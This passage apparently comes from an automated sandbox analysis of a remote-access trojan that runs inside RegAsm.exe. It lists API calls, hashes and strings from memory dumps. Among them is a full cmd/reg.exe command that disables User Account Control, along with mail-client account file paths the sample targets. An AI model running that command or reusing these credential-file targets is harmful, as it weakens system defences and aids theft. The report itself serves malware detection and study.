                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                      • String ID:
                      • API String ID: 493672254-0
                      • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                      • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                      • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                      • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                      APIs
                      • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                      • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: ErrorLastValue___vcrt_
                      • String ID:
                      • API String ID: 3852720340-0
                      • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                      • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                      • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                      • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                      APIs
                      • GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • _free.LIBCMT ref: 0044824C
                      • _free.LIBCMT ref: 00448274
                      • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                      • SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • _abort.LIBCMT ref: 00448293
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$_free$_abort
                      • String ID:
                      • API String ID: 3160817290-0
                      • Opcode ID: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                      • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                      • Opcode Fuzzy Hash: 35dcf3de7c71c62167c4cd53af3f8df7186468cbd06746618ca28f838e92064e
                      • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                      APIs
                      • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                      • _free.LIBCMT ref: 10005B2D
                      • _free.LIBCMT ref: 10005B55
                      • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                      • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                      • _abort.LIBCMT ref: 10005B74
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: ErrorLast$_free$_abort
                      • String ID:
                      • API String ID: 3160817290-0
                      • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                      • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                      • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                      • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Service$CloseHandle$Open$ControlManager
                      • String ID:
                      • API String ID: 221034970-0
                      • Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                      • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                      • Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
                      • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                      • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Service$CloseHandle$Open$ControlManager
                      • String ID:
                      • API String ID: 221034970-0
                      • Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                      • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                      • Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
                      • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                      APIs
                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                      • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Service$CloseHandle$Open$ControlManager
                      • String ID:
                      • API String ID: 221034970-0
                      • Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                      • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                      • Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
                      • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                      • __freea.LIBCMT ref: 100087D5
                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                      • String ID: 6/
                      • API String ID: 2652629310-4212659297
                      • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                      • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                      • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                      • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                      APIs
                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                        • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                        • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                        • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                        • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                      • API String ID: 4036392271-1520055953
                      • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                      • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                      • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                      • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                      APIs
                      • RegisterClassExA.USER32(00000030), ref: 0041D55B
                      • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                      • GetLastError.KERNEL32 ref: 0041D580
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ClassCreateErrorLastRegisterWindow
                      • String ID: 0$MsgWindowClass
                      • API String ID: 2877667751-2410386613
                      • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                      • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                      • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                      • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                      APIs
                      • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                      • CloseHandle.KERNEL32(?), ref: 004077AA
                      • CloseHandle.KERNEL32(?), ref: 004077AF
                      Strings
                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                      • C:\Windows\System32\cmd.exe, xrefs: 00407796
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseHandle$CreateProcess
                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                      • API String ID: 2922976086-4183131282
                      • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                      • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                      • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                      • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                      Strings
                      • Rmc-F4JFYD, xrefs: 004076DA
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-F4JFYD
                      • API String ID: 0-1884823758
                      • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                      • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                      • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                      • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                      • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                      • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                      • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                      • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                      APIs
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                      • String ID: KeepAlive | Disabled
                      • API String ID: 2993684571-305739064
                      • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                      • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                      • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                      • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                      APIs
                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                      • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                      • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                      • Sleep.KERNEL32(00002710), ref: 0041AE07
                      • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: PlaySound$HandleLocalModuleSleepTime
                      • String ID: Alarm triggered
                      • API String ID: 614609389-2816303416
                      • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                      • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                      • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                      • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                      APIs
                      • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                      • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                      • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                      • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                      Strings
                      • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Console$AttributeText$BufferHandleInfoScreen
                      • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                      • API String ID: 3024135584-2418719853
                      • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                      • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                      • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                      • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                      • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                      • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                      • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                      APIs
                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                      • _free.LIBCMT ref: 00444E06
                      • _free.LIBCMT ref: 00444E1D
                      • _free.LIBCMT ref: 00444E3C
                      • _free.LIBCMT ref: 00444E57
                      • _free.LIBCMT ref: 00444E6E
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: _free$AllocateHeap
                      • String ID:
                      • API String ID: 3033488037-0
                      • Opcode ID: d775a197f71d536e5d52874a7a30662ad33d8ad4d8240f212ad1ffb4432d1cba
                      • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                      • Opcode Fuzzy Hash: d775a197f71d536e5d52874a7a30662ad33d8ad4d8240f212ad1ffb4432d1cba
                      • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                      APIs
                        • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                        • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                      • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                      • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                        • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                        • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005
                        • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                        • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
